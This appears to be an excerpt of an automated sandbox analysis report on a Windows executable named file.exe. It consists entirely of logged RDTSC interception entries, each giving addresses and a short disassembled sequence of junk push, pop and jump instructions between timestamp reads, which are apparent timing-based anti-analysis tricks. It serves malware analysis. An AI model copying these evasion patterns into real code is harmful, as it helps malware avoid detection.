Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06AB2 second address: A06ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06ABF second address: A06AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B027 second address: A0B044 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F147AEA51h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B333 second address: A0B350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F1511CE2Dh 0x0000000b jo 00007F7F1511CE26h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B350 second address: A0B356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B356 second address: A0B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F7F1511CE2Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE32h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B380 second address: A0B399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F7F147AEA4Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B399 second address: A0B3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B3A4 second address: A0B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jo 00007F7F147AEA46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B63C second address: A0B648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B648 second address: A0B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA51h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 jng 00007F7F147AEA4Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007F7F147AEA46h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B821 second address: A0B845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c jmp 00007F7F1511CE38h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0BB56 second address: A0BBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F147AEA4Eh 0x00000008 jns 00007F7F147AEA46h 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007F7F147AEA7Dh 0x0000001c push edi 0x0000001d pushad 0x0000001e popad 0x0000001f jne 00007F7F147AEA46h 0x00000025 pop edi 0x00000026 pushad 0x00000027 jmp 00007F7F147AEA55h 0x0000002c jmp 00007F7F147AEA4Eh 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C0FF second address: A0C103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C5F6 second address: A0C648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F147AEA46h 0x0000000a jl 00007F7F147AEA46h 0x00000010 popad 0x00000011 jmp 00007F7F147AEA58h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7F147AEA58h 0x0000001e jo 00007F7F147AEA4Eh 0x00000024 jno 00007F7F147AEA46h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C648 second address: A0C65F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE31h 0x00000008 jmp 00007F7F1511CE2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6696 second address: 9D669A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D669A second address: 9D66A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6728 second address: 9D6735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6735 second address: 9D6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jg 00007F7F1511CE26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6750 second address: 9D6757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6757 second address: 9D6765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6765 second address: 9D67C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 jmp 00007F7F147AEA57h 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e mov cx, di 0x00000021 call 00007F7F147AEA49h 0x00000026 push ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pop ebx 0x0000002e push eax 0x0000002f jmp 00007F7F147AEA4Fh 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D67C2 second address: 9D67C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6908 second address: 9D690E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D690E second address: 9D6922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6922 second address: 9D6926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A6F second address: 9D6A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6CA2 second address: 9D6CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D718F second address: 9D7199 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7398 second address: 9D73DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c and ecx, 17A4E6AFh 0x00000012 lea eax, dword ptr [ebp+12487E1Dh] 0x00000018 nop 0x00000019 pushad 0x0000001a push esi 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7F147AEA57h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D73DD second address: 9D740C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jnc 00007F7F1511CE28h 0x00000013 pop esi 0x00000014 nop 0x00000015 mov edx, dword ptr [ebp+122D1A1Dh] 0x0000001b lea eax, dword ptr [ebp+12487DD9h] 0x00000021 add dword ptr [ebp+124770CDh], ebx 0x00000027 nop 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D740C second address: 9B7CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F7F147AEA59h 0x00000012 push ebx 0x00000013 jmp 00007F7F147AEA59h 0x00000018 pop ebx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F7F147AEA48h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 call dword ptr [ebp+122D2B4Eh] 0x0000003b jng 00007F7F147AEA7Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 jmp 00007F7F147AEA58h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7CC5 second address: 9B7CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CCF second address: A10CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA52h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CF1 second address: A10CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CF7 second address: A10D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 je 00007F7F147AEA48h 0x0000000d pushad 0x0000000e jmp 00007F7F147AEA56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10D1F second address: A10D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10D25 second address: A10D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F7F147AEA4Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13E96 second address: A13EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7F1511CE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16227 second address: A1623D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7F147AEA4Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15DB4 second address: A15DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15DBF second address: A15DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18A42 second address: A18A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18A48 second address: A18A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA4Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18C5B second address: A18C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18F04 second address: A18F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA59h 0x00000009 popad 0x0000000a jns 00007F7F147AEA48h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18F2D second address: A18F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F1511CE26h 0x0000000a jmp 00007F7F1511CE34h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F7F1511CE26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1D5CA second address: A1D601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Dh 0x00000007 jnp 00007F7F147AEA52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA52h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1D601 second address: A1D60D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1D60D second address: A1D611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DA38 second address: A1DA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBAA second address: A1DBE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 jmp 00007F7F147AEA4Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F147AEA55h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1DBE8 second address: A1DBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F1511CE26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A230AD second address: A230EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F147AEA51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA56h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F7F147AEA50h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23258 second address: A2327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE37h 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F7F1511CE26h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2327D second address: A232B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7F147AEA57h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A232B6 second address: A232BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A232BE second address: A232C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A232C7 second address: A232CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A236FB second address: A23704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23704 second address: A23708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6F2B second address: 9D6F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A24653 second address: A24657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2784A second address: A2784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F764 second address: 98F78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7F1511CE39h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27269 second address: A27273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A27273 second address: A27288 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F7F1511CE28h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2E9BD second address: A2E9C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CAA8 second address: A2CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F1511CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CAB2 second address: A2CAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CAB8 second address: A2CAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2CC4A second address: A2CC4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D360 second address: A2D364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D364 second address: A2D39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7F147AEA4Ch 0x0000000e jno 00007F7F147AEA46h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 jmp 00007F7F147AEA4Ah 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7F147AEA4Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D5F0 second address: A2D5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D5F6 second address: A2D600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D856 second address: A2D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2E11A second address: A2E120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2E120 second address: A2E134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3286E second address: A32874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32874 second address: A3287A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3287A second address: A3288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F7F147AEA46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3288B second address: A32891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32891 second address: A328A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F7F147AEA4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32BF0 second address: A32BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32FF8 second address: A32FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33177 second address: A3317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3317D second address: A33183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
